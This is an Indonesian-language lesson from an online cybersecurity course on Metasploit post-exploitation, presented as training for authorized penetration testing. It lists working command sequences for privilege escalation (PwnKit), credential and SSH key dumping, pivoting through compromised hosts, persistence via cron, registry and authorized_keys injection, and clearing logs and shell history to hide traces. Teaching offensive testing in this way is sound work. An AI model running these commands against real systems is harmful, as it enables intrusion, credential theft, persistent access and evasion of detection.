Pascaeksploitasi: Pivot dan Persistensi
Gunakan modul pascaeksploitasi Metasploit untuk eskalasi hak akses, pengambilan kredensial, dan persistensi.
Pascaeksploitasi: Pivot dan Persistensi adalah pelajaran Cyber Security Academy gratis di CoddyKit. Ini adalah pelajaran 4 dari 4. Kamu bisa membaca pelajaran lengkapnya di bawah secara gratis — lalu praktikkan langsung di browser dengan editor kode bawaan dan tutor AI 24/7. Ini adalah bagian dari jalur belajar Cyber Security Academy, dan progresmu tersinkronisasi di web dan aplikasi CoddyKit. Kursus Cyber Security Academy mencakup 4 pelajaran total.
Tujuan Pascaeksploitasi
Setelah akses awal diperoleh, tujuan penyerang adalah: meningkatkan hak akses, mengumpulkan intelijen, mempertahankan akses persisten, dan bergerak secara lateral untuk mencapai tujuan sebenarnya (data, sistem, kendali domain).
Kesadaran Situasional
Langkah pertama setelah mendapatkan shell: pahami posisi Anda. Kumpulkan informasi sistem, konfigurasi jaringan, hak akses pengguna saat ini, proses yang berjalan, dan variabel lingkungan.
meterpreter > sysinfo
meterpreter > getuid
meterpreter > getpid
meterpreter > run post/multi/recon/local_exploit_suggester
meterpreter > run post/linux/gather/enum_systemPeningkatan Hak Akses
Peningkatan hak akses lokal berpindah dari shell dengan hak akses rendah ke root/SYSTEM. local_exploit_suggester milik Metasploit mengidentifikasi eksploitasi kernel/lokal yang berlaku berdasarkan versi OS target.
meterpreter > run post/multi/recon/local_exploit_suggester
# Identifies applicable exploits
# Then:
msf6 > use exploit/linux/local/cve_2021_4034_pwnkit
msf6 > set SESSION 1
msf6 > runPengumpulan Kredensial
Kumpulkan kredensial: kata sandi yang di-hash, kredensial teks biasa dalam berkas konfigurasi, kata sandi tersimpan di peramban, dan kunci SSH. Semua ini memungkinkan pergerakan lateral dan persistensi.
meterpreter > run post/linux/gather/hashdump
meterpreter > run post/windows/gather/credentials/credential_collector
meterpreter > run post/multi/gather/ssh_creds
# Check env vars for cleartext creds:
meterpreter > run post/multi/gather/envPivoting: Penerusan Port
Pivoting menggunakan host yang telah disusupi sebagai jembatan untuk menjangkau jaringan internal yang terisolasi. portfwd milik Metasploit membuat penerusan port lokal melalui sesi Meterpreter.
# Forward local port 3306 to internal DB
meterpreter > portfwd add -l 3306 -p 3306 -r 10.10.10.20
# Now connect locally:
mysql -h 127.0.0.1 -P 3306 -u rootPerutean Melalui Sesi
Modul rute Metasploit menambahkan rute jaringan melalui sesi, sehingga modul lain dapat menjangkau jaringan yang hanya dapat diakses melalui host pivot.
msf6 > route add 10.10.10.0/24 1 # route via session 1
msf6 > route print
# Now run modules targeting 10.10.10.x
# through session 1 as pivotPivoting melalui Proksi SOCKS
Proksi Socks melalui Metasploit (atau chisel/ssh -D) memungkinkan Anda merutekan alat apa pun melalui pivot menggunakan proxychains — sehingga nmap, curl, dan peramban dapat menjangkau jaringan internal.
# Set up SOCKS proxy through session
msf6 > use auxiliary/server/socks_proxy
msf6 > set SRVPORT 1080
msf6 > set VERSION 5
msf6 > run -j
# Route tools through proxy
proxychains nmap -sT 10.10.10.0/24Mekanisme Persistensi
Persistensi memastikan akses tetap bertahan setelah mulai ulang dan kehilangan sesi. Metode umum: tugas cron (Linux), kunci run pada registri (Windows), injeksi authorized_keys SSH, dan pemasangan layanan.
# Linux: cron-based persistence
meterpreter > run post/linux/manage/cron_persistence
# Windows: registry
meterpreter > run post/windows/manage/persistence_exe
# SSH key injection
echo "ssh-rsa AAAA..." >> /root/.ssh/authorized_keysMenyamarkan Jejak
Penyerang menghapus log untuk mempertahankan penyamaran. Catatan keamanan: solusi SIEM dan EDR modern mengirimkan log ke luar host secara waktu nyata — menghapus log lokal tidak menghapus catatan terpusat.
meterpreter > clearev # clear Windows event logs
# Linux: clear bash history
unset HISTFILE
cat /dev/null > ~/.bash_historyModul Pascaeksploitasi
Metasploit mencakup ratusan modul pascaeksploitasi untuk Windows dan Linux: pengumpulan kredensial, data peramban, pencatatan tombol, pengambilan tangkapan layar, dan enumerasi jaringan.
msf6 > use post/windows/gather/enum_logged_on_users
msf6 > use post/multi/gather/browser_history
msf6 > use post/windows/gather/screen_spy
msf6 > set SESSION 1
msf6 > runMengetahui Kapan Harus Berhenti
Dalam pengujian penetrasi yang diotorisasi, berhentilah ketika Anda mencapai tujuan lingkup yang disepakati atau menemukan data yang tidak berwenang untuk Anda akses. Dokumentasikan jalur Anda dengan cermat — inilah rantai serangan yang Anda laporkan.
Pemeriksaan Singkat
Apa yang dimungkinkan oleh perintah "route add" Metasploit?
Ringkasan: Pascaeksploitasi
Pascaeksploitasi dibangun di atas akses awal untuk mencapai dampak nyata: peningkatan hak akses, pengumpulan kredensial, pergerakan lateral, dan persistensi. Metasploit menyediakan modul pascaeksploitasi untuk setiap tahap. Dokumentasikan setiap langkah — rantai serangan dari titik masuk hingga tujuan merupakan hasil utama pengujian penetrasi.
Belajar Cyber Security Academy dengan tutor AI — gratis
Tulis dan jalankan kode asli di browser kamu, dapatkan bantuan instan dari tutor AI 24/7, dan lanjutkan di mana kamu tinggalkan di web atau aplikasi.
- Kursus
- 76
- Pelajaran
- 303
Pertanyaan yang Sering Diajukan
Apakah pelajaran “Pascaeksploitasi: Pivot dan Persistensi” gratis?
Ya — teks lengkap “Pascaeksploitasi: Pivot dan Persistensi” gratis dibaca di sini di web. Untuk praktiknya secara interaktif (editor kode bawaan dan tutor AI 24/7) dan buka sisa kursus Cyber Security Academy, upgrade ke CoddyKit PRO. Kursus Cyber Security Academy mencakup 4 pelajaran total.
Apa yang akan aku pelajari di “Pascaeksploitasi: Pivot dan Persistensi”?
Gunakan modul pascaeksploitasi Metasploit untuk eskalasi hak akses, pengambilan kredensial, dan persistensi. Kamu berlatih Cyber Security Academy dengan kode praktik yang langsung kamu jalankan di browser, dan tutor AI 24/7 menjawab pertanyaanmu saat kamu mengerjakan pelajaran ini.
Apakah aku perlu pengalaman untuk memulai Cyber Security Academy?
Tidak diperlukan pengalaman sebelumnya. Cyber Security Academy di CoddyKit dirancang untuk pemula hingga pelajar tingkat lanjut, jadi kamu bisa memulai di sini atau dari awal dan belajar sesuai kecepatan kamu sendiri. Ini adalah pelajaran 4 dari 4.
Berapa lama pelajaran “Pascaeksploitasi: Pivot dan Persistensi” memakan waktu?
Sebagian besar pelajaran CoddyKit memakan waktu sekitar 5–10 menit. Setiap pelajaran ringkas dan interaktif, jadi kamu membuat kemajuan stabil dan melanjutkan dari tempat kamu tinggalkan di web dan aplikasi.
Bisakah aku menulis dan menjalankan kode dalam pelajaran Cyber Security Academy ini?
Ya. Setiap pelajaran Cyber Security Academy menyertakan editor kode bawaan, jadi kamu menulis dan menjalankan kode nyata langsung di browser dan mendapatkan umpan balik AI instan — tidak diperlukan penyiapan lokal.
Semua pelajaran dalam kursus ini
- Arsitektur Metasploit dan msfconsole
- Mengeksploitasi Kerentanan yang Diketahui
- Muatan: Bertahap vs Tanpa Tahap, Meterpreter
- Pascaeksploitasi: Pivot dan Persistensi